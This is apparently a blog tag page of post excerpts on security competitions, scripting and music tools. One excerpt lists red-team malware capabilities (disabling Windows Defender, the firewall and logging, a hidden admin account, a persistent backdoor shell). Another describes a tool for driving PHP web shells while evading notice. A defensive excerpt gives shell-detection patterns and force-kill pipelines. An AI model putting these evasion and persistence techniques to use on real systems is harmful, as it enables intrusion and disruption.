Articles tagged old

  1. Compiling Redistributable DLL Independent in Visual Studio


    I just was looking into this today and figured it was worth posting about. Usually code compiled with Visual Studio needs a redistributable package (ex. C++ Redistributables) to run. This is a set of DLLs that allows resulting executable to be smaller by having common function calls be distributed in the DLL rather than in the executable file itself. There is a way to turn this off though so your malware/program/whatever can stand on its own.

    Build-Properties
    Project -> [Project Name] -> Properties
    Configuration
    Configuration Properties -> C/C++ (or whatever language) -> Code Generation -> Runtime Library -> Set to Multi-Threaded (/MT)

    It's as easy as that!

  2. Simple Limited Backup Script


    I was setting up cron tasks for updating and backing up this site today and wrote a very simple script to backup mysql and keep only the 10 most recent backups. Check it out:

    #!/bin/bash
    date=<code>date +%m%d%Y-%H%M%S</code>
    cd $@
    mysqldump --user=backupuser --password="mysqluserpassword" --all-databases --add-drop-table 2>/dev/null > mysql-backup-$date.sql
    
    ls -t \| tail -n +11 \| xargs rm &>/dev/null
    

    This script dumps all databases and saves it as mysql-backup-$date.sql where $date is "MonthDayFullyear-HourMinSec" in a directory passed as an argument. Then it does an ls -t on the directory the backups are stored in (-t sorts ascending by date) then tail-ing lines 11 and up, ignoring the first 10. This is then fed to xargs rm to remove all but the 10 newest backups. I thought it was neat because it doesn't even require an if statement but still gets the job done. Obviously this can be used for other types of backups, too; just use the last line of this script after backing things up and you are good to go!

    (the user backupuser only has read permissions on the DBs, so putting the password in this script isn't such a big deal)

  3. RNCCDC


    Last of Us

    This year I had the honor of competing on the Collegiate Cyber Defense Competition (CCDC) team for RIT. For those of you unfamiliar with the CCDC it is the largest collegiate cyber security competition in the entire country. Over 180 schools competed in qualifying competitions, 10 from each of the 10 regions competed and the winner from each region had the chance to compete in the National CCDC for the Alamo Cup. The competition consists of three main teams:  blue, red, and white. The blue teams are teams of eight students from a school that try to secure and defend systems they are given during the competition. The systems they are given have critical services to maintain such as email or DNS and also are bullet ridden with security flaws. At the same time they are also responsible for injects, or business tasks such as set up a VPN or central logging. The red team is a group of security professionals that try to hack into the blue teams' systems and disrupt their services. Blue teams are responsible for detecting and reporting red team activity in the form of incident response reports. The white team is the team that sets up the competition, designs the systems that are used in the competition, and monitor teams as they defend their networks and complete injects. Qualifying events are usually around 8 hours long, regionals are usually two or three days, and finally nationals consists of two days.

    For the past couple of years RIT has won the North East Collegiate Cyber Defense Competition (NECCDC) and gone onto nationals. This year was no exception. I would go into more detail about that but this post is mainly focussed on nationals. Last year was the same, except the team won the national championship, so the team this year had quite a name to live up to.

    Over the past few months I have gotten to know each and every one of my team members. They are honestly some of the smartest and most driven people I have ever met. We practiced and competed for months before the Raytheon National Collegiate Cyber Defense Competition (RNCCDC) of this year in San Antonio, Texas.

    Our time practicing involved studying multiple OSs, securing them, learning to run services on them, detecting and stopping attacks, and preparing for the worst. Having heard all about the competition from members of the team that were there last year I was both nervous and excited.

    We had no idea what we were in for...

    ...


    Check out the full post for more details!

  4. Writing Me Some Windows Malware


    This year I had the pleasure of being part of the red and white teams for the first RIT Competitive Cybersecurity Club (RC3) Hacking Competition. The competition was set up similar to ISTS or CCDC with blue teams defending, a white team that sets up, and a red team that tries to hack the blue teams. This was my first actual red team experience in a competition scenario. I was tasked to take on Windows with the other Windows guy on the CCDC team. So naturally I spent the week writing some intense malware to challenge the blue teams. This post explains a bit of what I did and some of the clever tricks I used to keep myself hidden. This malware was designed to run on Windows Vista and up and was written in C++ totalling about 2400 lines. All written in Visual Studio 2013. It was nice to get back to C++ and the Windows API as I haven't done much C or C++ since Client Server Programming with Kennedy in the Spring. It was a bit frustrating at times, especially because I didn't understand unicode compatibility until about halfway through writing this (THREE HOURS to prepend and append a quote at either end of a string...).

    Screen Shot 2014-05-12 at 11.36.11 PM

    Malware Functions (tl;dr, implementations below!):

    • Shut security center off
    • Shut event log off
    • Shut Windows Defender off
    • Shut off firewall
      • Turn it off
      • Set the default policy to allowinbound,allowoutbound
      • Take an existing rule from both the in and out chains, take their names and descriptions, delete the originals, and re-add them as allow all rules
      • Take any existing block rules and make them allow rules
    • Turn on RDP constantly
    • Add and re-add a user called limecat as admin
    • Create a service that spawns the malware on boot and re-spawns it if it is killed
      • If the service is killed/disabled/uninstalled then the main program spawns it back
    • Multi-threaded, multi-connection backdoor command shell
    • Sticky keys command prompt
    • Prevented the user from launching procexp.exe and ProcessHacker.exe

    More info and code after the jump. ...


    Check out the full post for more details!

  5. Controlling Google Play Music Globally On Mac


    I spent a couple of hours today figuring out a way to control Google Play music within Chrome using the media keys on my Macbook. I'm using three different applescripts that run javascript in the Play Music page to do the desired action. Here's the base script:

    on run
         tell application "Google Chrome"
             set allWins to every window
             set allTabs to {}
             repeat with currWin in allWins
                 set allTabs to allTabs &amp; every tab of currWin
             end repeat
             repeat with currTab in allTabs
                 try
                     if (title of currTab as string) ends with "Play Music" then set musicTab to currTab
                 end try
             end repeat
             tell musicTab to execute javascript "document.querySelector('[data-id=\\"play-pause\\"]').click();" -- change play-pause to forward or rewind for the other two scripts
         end tell
    end run
    

    From here I used BetterTouchTool to launch the script respective to the action I wanted when the corresponding button was pressed. OSX handles media keys very strangely, though. So I am currently binding to shift-function key, with the function keys being below the media buttons. The whole key combo to play-pause ends up being fn-shift-play/pause on my keyboard. Nifty, and it doesn't even need to bring the window to the front.

    Source: http://hints.macworld.com/comment.php?mode=view&cid=128504

  6. Linux Processes (and killing remote connections) Without ps


    The other day I was posed with a unique problem: find the PID's of remote connections without the ps command. I was in a practice red team/blue team scenario on the blue team side where I was letting the attacker in on purpose and killing their connection from time to time. This exercise was to allow people who don't have much experience on red team the chance to get in and mess with things. We even gave them a head start, which was about 20 minutes on the boxes making them vulnerable before the blue team got to see/touch them. When I sat down a few things had been changed: aliases in bash_profile, cron tasks, web shells (it was a web box), and some other nonsense. I quickly fixed everything and put up my iptables rules. A quick issue of the w command assured me that nobody was in.

    I ended up getting bored and creating a NOPASSWD sudo account bob:bob for people to own me with. One person decided to log in and try their hand at ruining my box. I made it a point to kill their connection every so often using w to figure out the pts they were on, ps aux | grep pts/x (x being their session number) to figure out the process ID of their login shell, and then kill -9 to finally kick them off.

    The person attacking me saw that I kept killing their connection so they deleted the ps command. I was left helpless in trying to figure out what processes they were running. Of course there are two fairly obvious solutions, one that I thought of and one that I didn't at the time. I thought to reinstall the ps binary with yum install --reinstall coreutils but there was no internet in the lab I was in so that wasn't an option. I spent my time trying to figure out one liners to kill remote connections without using ps...

    The first method I thought up was using the /proc directory, as all of the processes are in there by process ID. I started exploring all of the options the find command had to offer. Since the environ file within processes' directories listed the the variable TTY I had a place to start. Here is what I came up with:

    find /proc -maxdepth 2 -name environ -exec grep /dev/pts {} \; | cut -d/ -f3 | xargs kill -9
    
    • find - the find command (use `man find` for details, this command is very powerful)
    • /proc - the directory that find looks in
    • -maxdepth 2 - Tells find to search at the maximum two directories deep. This is done because the environ file is located deeper in processes' directory but is the same file. We only want one match.
    • -name environ - Specifies the name of the file we are looking for. In this case it is environ.
    • -exec grep /dev/pts {} \\; - Find executes the command `grep /dev/pts` on each file found. The `{} \;` is just part of the syntax
    • cut -d/ -f3 - takes the output of the find command and extracts the PID from it (the find command will output "Binary file /proc/<PID>/environ matches" so we are finding the third field (-f3) delimited by / (-d/), which is the PID)
    • xargs kill -9 - takes in the PIDs as arguments to kill and force kills the process

    One problem with this method is that on some distributions (such as CentOS) some sessions that are local are listed as pts sessions, so running the w command to check your session is a good idea before you run this. If you are running under a pts the command would look something like this:

    find /proc -maxdepth 2 -name environ -exec sh -c 'grep -v /dev/pts $0 | grep -av /pts/<strong>#</strong> &gt;/dev/null' {} \; -print | cut -d/ -f3 | xargs kill -9
    
    • find - the find command (use `man find` for details, this command is very powerful)
    • /proc - the directory that find looks in
    • -maxdepth 2 - Tells find to search at the maximum two directories deep. This is done because the environ file is located deeper in processes' directory but is the same file. We only want one match.
    • -name environ - Specifies the name of the file we are looking for. In this case it is environ.
    • -exec sh -c 'grep -a /dev/pts $0 \| grep -av /pts/# >/dev/null' {} \\; - Find executes the command `grep -a /dev/pts \| grep -av /pts/#` on each file found. The `{} \\;` is just part of the syntax. In this case the "#" is the pts you are on. It will be grep-ed out of the output, therefore not showing in the -print result.
    • -print - prints any files that have output when run through the -exec portion.
    • cut -d/ -f3 - takes the output of the find command and extracts the PID from it (the find command will output "/proc/<PID>/environ" so we are finding the third field (-f3) delimited by / (-d/), which is the PID)
    • xargs kill -9 - takes in the PIDs as arguments to kill and force kills the process

    The other route that was brought to my attention was through netstat to kill remote connections by pid. This is arguably more effective than the one above.

    netstat -apunt | grep STAB | awk '{print $7}' | cut -d/ -f1 | xargs kill -9
    
    • netstat -apunt - Prints active connections.
    • grep STAB - Picks established connections out of the output of netstat
    • awk '{print $7}' - prints "<PID>/<PTS #>", which is the 7th field in the output of netstat.
    • cut -d/ -f1 - takes "<PID>/<PTS #>" and extracts the PID from it
    • xargs kill -9 - takes in the PIDs as arguments to kill and force kills the process

    This got me thinking on how to kill backdoors such as the b(l)ackhole backdoor. Processes that run any type of shell directly are probably malicious. I have found this in my tests. To find active backdoors I tried the following:

    find /proc -maxdepth 2 -name cmdline -exec egrep "/bin/[a-z]+?sh" {} \; | cut -d/ -f3 | xargs kill -9
    
    • find - the find command (use `man find` for details, this command is very powerful)
    • /proc - the directory that find looks in
    • -maxdepth 2 - Tells find to search at the maximum two directories deep. This is done because the cmdline file is located deeper in processes' directory but is the same file. We only want one match.
    • -name cmdline - Specifies the name of the file we are looking for. In this case it is cmdline.
    • -exec egrep "/bin/[a-z]+?sh" {} \\; - Find executes the command `egrep "/bin/[a-z]+?sh"` on each file found. This will find any reference to a shell launched. The `{} \\;` is just part of the syntax.
    • cut -d/ -f3 - takes the output of the find command and extracts the PID from it (the find command will output "Binary file /proc/<PID>/environ matches" so we are finding the third field (-f3) delimited by / (-d/), which is the PID)
    • xargs kill -9 - takes in the PIDs as arguments to kill and force kills the process

    Additionally you can use netstat to monitor established connections.

    Some other approaches are to use lsof and who to figure out PIDs. The lsof command is used to figure out what programs have what files open. It has a ton of options but with just a few of them it can be very easy to see what is being accessed. The options we care about allow us to see what files are open, who opened them, and what connections are being made. It looks something like this: (thanks Luke!)

    lsof -nPi
    

    n - Ignore host names P - Do not convert port numbers to port names i - see internet connections files are making

    What is unique about this is that it will show what files are listening or have established connections. It becomes much easier to see if there is some sort of backdoor listening and what it is called.

    For the who command I use the -u option and present another method of killing things:

    who -u | grep pts | awk '{print $6}' | xargs kill
    

    Again here keep in mind that some operating system's window manager list as the lowest pts, so grep -v that before you go and kill all connections.

  7. More Automation With Music - spotify2playmusic.py


    I spent about 15 hours today writing another tool in python that moves Spotify playlists over to Play Music... ~300 lines later, it is done.

    It is unique because it does not just do exact song matching, it does matching based on similarities in strings using the levenshtein calculation. The number returned by the levenshtein function represents how different (or not different) the two strings that were fed into the function are. A lower number means they are similar.

    Anyway, here it is; it's late so I'm not going to write much more on it. All of the how-to is on my GitHub: https://github.com/jgeigerm/spotify2playmusic

    Screen Shot 2014-03-26 at 3.27.01 AM

  8. Making it Rain Shells, Web Shells - shell_interact.pl


    shell_interact is a project I have been working on since the new year and it is just finally starting to shape up into a nice little tool. PHP backdoor shells can be fun, especially when the permissions on the box have been messed with (i.e. www-data is allowed sudo with no password, /etc/shadow has wide open permissions, etc.). The downside is that you have to type each command into the URL bar of the browser. Kind of annoying. So I started on a solution.

    Perl is one of my stronger languages. I love regex and all of the built in functions it has. So I decided to use it for this project, having just come out of the perl class at RIT (with the notorious Dan Kennedy).

    The script utilizes curl to search for the shell and allow the user to enter commands in a bash like environment if one is found. All of the input is URL encoded so the activity from the program doesn't look as suspicious on the target server. If you enter a command that expects more input (such as vim) and curl hangs, using control-c will terminate curl and return you to the web shell prompt. Stderr is redirected to stdin for every command to allow you to see errors without having to do it manually. It also enables the cd command by changing directories before each user entered command is run. It's pretty nifty, and the code is mostly commented.

    You can find the code on my GitHub, you can read more about the features/bugs there: https://github.com/jgeigerm/web_shell

    shell_interact.pl

  9. Automate ALL THE THINGS - rmGPMdupes.py


    I recently decided to switch from Spotify Premium to Google Play Music Unlimited for a couple of reasons. The main one being the mobile app that each has to offer. A couple of months ago I decided that I wanted to pay for a music service because it would end up costing the equivalent of one album per month, which is way less than I actually bought. I wanted a service that had a big catalog, a good mobile app, and the ability to sync my local songs that were not in the service's database. The obvious first reaction choice was Spotify because I had been using it for free for a while and had actually paid for and used the Premium version on my iPhone previously. There was, on the other hand, Google Play Music Unlimited, which was made known to me via the Google Play Music app on my Galaxy S4 that I got in July. I had already known of Google Play music and had already uploaded around 10,000 of my songs to it, but had just recently seen the Unlimited service. The main turn off about Google Play Music unlimited at the time was the app. It did not allow you to store your downloaded tracks locally on the external SD card, only the internal one. The Spotify app did. So that's what I went with...

    The Spotify app developed some problems over the time that I paid for the service. One of the major let downs was the need to sync local files from my computer, which wouldn't have been so much of a problem if the app didn't delete my local songs about once a week. The sync feature would not work on the RIT wifi so I had to sync it by other means (namely setting up a shared wireless connection from my laptop and having my phone join it to sync.) Another issue I had was the noise... Music would often glitch and skip while I was listening to it. This drives me NUTS.

    About a week and a half ago I took another look at the Google Play Music app and to my surprise, found an option to store downloaded music on the external card. I immediately cancelled my Spotify Premium subscription and signed up for Google Play Music Unlimited.

    So now the daunting task of moving my playlists over...

    When I moved from iTunes to Spotify I used an online converter to import my playlists, and have made some since. Google Play Music Manager automatically updates playlists from iTunes as they are made. The problem with this is that these playlists sometimes (most of the time) contain duplicate songs. This is annoying as I like my playlists nice and organized with no duplicates.

    So I found myself going through and deleting all of the duplicates manually for about 5 playlists... and then I said to myself. "there has to be a way to automate this."

    Sure enough, Googling "google play music api" resulted in the Unofficial Google Music API by Simon Weber written in python.

    I am sort of new to python at this point but I am actively learning it by taking on small projects such as this. I am also reading the "Violent Python" and "Grey Hat Python" books to help me apply the language to my profession.

    So here it is... rmGPMdupes.py: https://github.com/jgeigerm/rmGPMdupes

    It took about 4 hours to get to know the API and fix bugs but it works and I can use my Google Play Music player without going crazy due to the duplicate songs in my playlists!

    Now back to moving playlists from Spotify to Play Music... grumble

tag/old/